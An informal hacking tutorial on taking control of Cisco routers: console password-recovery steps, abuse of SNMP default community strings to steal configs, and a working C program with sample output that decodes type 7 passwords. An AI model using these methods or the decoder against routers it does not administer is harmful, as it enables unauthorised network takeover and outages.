[Intro] . [Console Attack] . [Remote Attack] . [Password Cracking]

 

Intro

I have seen a lot of information reguarding security mismanagement of servers; Unix, linux, NT, Novell, or AS400. However, one point has been missed consistantly by many articles. If the router is down the entire network is down. If you cannot route packets to your destination, you cannot do anything. Many people believe that a Cisco router is impervious to attacking, this is simply not the case.

I am going to delve into security (or insecurity) of the largest player in this industry; Cisco. You will more than likely be as surprised as me to see how security, and lack thereof is handled by these devices.

Basically, the Cisco IOS has more than one level of authority to it's system. After connecting to the machine via telnet or a console cable, you are asked for a password for the machine. This is the general password to the box. Usually it is very common, such as hostname or hostnamenet or similar. I have even seen them having whitespace or no password. This is not a secure level of control over the router. However, the next step is the getting the enable password. This enables all of the controls and interface commands via the console. This is a *very* dangerous level of authority to give users.

I am going to cover a few commonly used methods of obtaining this level of access. The Console method requires you to have physical access to the router.

Console Attack

Now if you actually have physical access to the router there is a method to change/set the enable password. This method is actually published by Cisco as a method for recovering a router once the enable password has been lost.

Step 1 Attach a terminal or PC with terminal emulation software to the console port of the router. Windows HyperTerm / Hyperterminal works well here.

Step 2 Enter the show version command and record the setting of the configuration register. It is usually 0x2102 or 0x102.

The configuration register value is on the last line of the display. Note whether the configuration register is set to enable Break or disable Break.

The factory-default configuration register value is 0x2102. Notice that the third digit from the left in this value is 1, which disables Break. If the third digit is not 1, Break is enabled.

Step 3 Turn off the router, then turn it on.

Step 4 Press the Break key on the terminal within 60 seconds of turning on the router.

The rommon> prompt with no router name appears. If it does not appear, the terminal is not sending the correct Break signal. In that case, check the terminal or terminal emulation setup.

Step 5 Enter o/r0x42 at the rommon> prompt to boot from Flash memory or o/r0x41 to boot from the boot ROMs.

Note that the first character is the letter o, not the numeral zero. If you have Flash memory and it is intact, 0x42 is the best setting. Use 0x41 only if the Flash memory is erased or not installed. If you use 0x41, you can only view or erase the configuration. You cannot change the password.

Step 6 At the rommon> prompt, enter the initialize command to initialize the router.

This causes the router to reboot but ignore its saved configuration and use the image in Flash memory instead.

The system configuration display appears.

Step 7 Enter no in response to the System Configuration Dialog prompts until the following message appears:

Press RETURN to get started!

Step 8 Press Return.

The Router> prompt appears.

Step 9 Enter the enable command.

The Router# prompt appears.

Step 10 Choose one of the following options:

To view the password, if it is not encrypted, enter the show startup-config command.

To change the password (if it is encrypted, for example), enter the configure terminal command to make the changes to the configuration, or the write memory command to save the changes to NVRAM. For example:

Router # configure terminal Router(config)# enable password 1234abcd Router(config)# ctrl-z Router # write memory

To erase the configuration, enter the write erase command.

Step 11 Enter the configure terminal command at the EXEC prompt to enter configuration mode.

Step 12 Enter the config-register command and whatever value you recorded in step 2.

Step 13 Press Ctrl-Z to quit from the configuration editor.

Step 14 Enter the reload command at the privileged EXEC prompt and issue the write memory command to save the configuration.

 

Pretty scary how easy that was, isn't it?

 

Remote Attack

So, you dont have the key to the server room or telco closet, or is that router 2000 miles away? Are you out of luck? No of course not, you just have to use a different method to get the enable level authority. Without further ado, let's begin.

Most organizations have different routers doing different tasks. Some are access routers, some perform core backbone routing, or edge routing. The point being most companies have a few of these devices spread out all over their company. Administrators must perform the day to day support and monitoring of these devices to be sure that things are running smoothly. This includes making sure interfaces are up, CPU utilization is within acceptible ranges, verifying that there are no unusual traffic patterns that might indicate a hostile attack, and many many more tasks. One thing most of these administrators use to help them perform their jobs is SNMP. Simple Network Management Protocol is a widely used method to communicate with many devices, from routers to switches to NT and Unix servers. Almost any network device has the ability to use SNMP for monitoring and alerting.

There are a few bad things about SNMP from a security standpoint tho.

First, and probably most importantly, SNMP Version 1 has no real concept of authentication. Any device with SNMP setup will happily fulfill any request it receives. (To receive a request the only thing that is required is a community name, a small string of text used for configuration.)

Although SNMP 2 has provisions for encrypting packets, this is not widely deployed, you guessed it, never enabled by default.

The second bad thing about SNMP is that it usually also comes enabled by default. And these community names are set to a default of public and private. The public community usually can see information and the private can set information. eek!

The third bad thing about SNMP is that it is an extremely "noisy" protocol. This means that it sends alot of network traffic back and forth. A common implementation will employ a Managerial workstation (such as a network admin) that monitors many different devices. Each device may be polled every 60 seconds. Each packet that goes out contains these community strings. A quick "sniff" of the network can provide you with these in the event they have been changed from the defaults.

The last item I want to bring up in this list of negatives about SNMP is a very common misconfiguration allowing ANY host to access a host via this protocol. Most networks I have seen allow for any node on the entire Internet to be able to communicate with their internal network via SNMP.

So what can SNMP give the user? Among many very useful things like CPU utilization, interface statistics, port details, it also can be used to set various items inside the router. We are going to focus on a few of these.

  1. Change Routes
  2. Reset Interfaces
  3. Draw entire maps of infrastructure.
  4. Copy and load config files to alternate servers

Now, playing with routes or interface might be a quirky fun thing to do, but the last two I mentioned have very severe security implications. Using SNMP not only can I get an entire picture of the network, with all the switches, hubs, servers routers, I have the ability to load new configurations or view their current configs. This is ground zero.

By simply guessing or sniffing the community names you open enough window to bring down an entire network.

 

Password Cracking

You have a nice config file to work with, now what? First you need to get some of the information off of the router. Look inside that config file you just stole.

Just in case you didnt snag the config file by SNMP but happened apon it by means of sniffing, or sloppy file server permissions you can skip ahead a few paragraphs.

In case you have console access to the router and want to get a config file, type sh config. Now it is important to realize that different machines have different command subsets. If sh config doesn't work, try sh running-config and sh startup-config. This should give you info about the machine. The information you are specifically interested in is the:

enable secret 5 efb487d9fbhen5oy485y&%#B7gtu32ib&

or perhaps

enable password 7 08204E

This is the encrypted string that contains the password to the box. There is a hint here given to us from Cisco. The 5 is telling us that the password is encrypted by MD5. The 7 is a much weaker algorythm than that can easily be squandered. Now all that is left is cracking it. Mudge has posted the basics of what the Cisco "7" algorthym is, let's take a look at what he has to say:

enable password 7 08204E

The encrypted string is 08204E.

"It must be an even length of digits and the first two digits are used as a base 10 index into the XOR string. The length of the plaintext password is strlen(enc_pw) -2 / 2. In this case 2 chars. 08 is the index into the xor string. 2 is multiplied by 16 (or left shifted 4 times) then the next digit (0) is added to it. [ == 32] 32 XOR xorstring[08] = 'a' Move to the next two digits and repeat - 4 * 16 = 64 64 + 14 (E) = 78 increment the index into the xor string 78 XOR xorstring[08] = 'b' "

Given this information it is trivial to code a quick c program that can be used to crank out the password;

For example: 


#include <stdlib.h>
#include <ctype.h>
#include <string.h>
#include <stdio.h>

int *HexPairsToIntArray(char *, int *, int *);

int main( int argc, char **argv )
{
 char Crypto[256];
 char value[] = "tfd;kfoA,.iyewrkldJKD";
 int Elements; 
 int Error;
 int i;
 int unencchar; 
 int indy = 0;
 int *Keys = NULL;
 int index;
  
 if( argc < 2 )
  {
   printf("Input String to Decode : ");
   fgets(Crypto, sizeof Crypto, stdin);
  }
  
  else
  {
   strcpy( Crypto, argv[1] );
  }
  
  Keys = HexPairsToIntArray(Crypto, &Elements, &Error);
 
  if(NULL == Keys)
  {
   printf("Error allocating memory for keys\n");
  }
  else
  {
   if(Error != 0)
    {
     printf("Data error? Code %d\n", Error);
    }
    else
    {
     printf("Decoding... %s\n\n", Crypto);
     for(i = 0; i < Elements; i++)
      {
       if (i<1)
        {
         index= (Crypto[0] - '0') * 10 + (Crypto[1] - '0');
         indy = (index-1);
        }
       else
        {
         unencchar = Keys[i] ^ value[indy];
         printf("Key[%d] = %d XOR %d = %c\n", i, Keys[i], value[indy], unencchar);
         indy++;
         if (indy==21) 
          {
           indy = 0;
          }
       }
    }
  }
 free(Keys);
 }
 return 0;
}


int *HexPairsToIntArray(char *s, int *n, int *err)
{
 int *array = NULL;
 char hextran[] = "0123456789ABCDEF";
 char *p;
 int i = 0;

 *err = 0;
 if(s)
  {
   *n = strlen(s) / 2;
   array = calloc(*n, sizeof(int));
   if(array != NULL)
    {
     for(i = 0; i < *n && 0 == *err; i++)
      {
       p = strchr(hextran, *s);
       if(p != NULL)
        {
         array[i] = ((p - hextran) << 4);
         s++;
         p = strchr(hextran, *s);
         if(p != NULL)
          {
           array[i] |= (p - hextran);
           s++;
          }
         else
          {
           *err = 2;
          }
        }
       else
        {
         *err = 2;
        }
      }
    }
  }
 else
  {
   *err = 1;
  }
  return array;
}



      

      

      
The above ANSI C code was written by me and is available to any via GPL licensing.   
This is an example of running it :  
      
(The password is 'ab' the encrypted string is '08204E')       
Input String to Decode : 08204E Decoding... 08204E  
      
Key[1] = 32 XOR 65 = a    
Key[2] = 78 XOR 44  = b  
      

      

      

      

      

      

      

      
And now we know how 
        to crack those pesky passwords...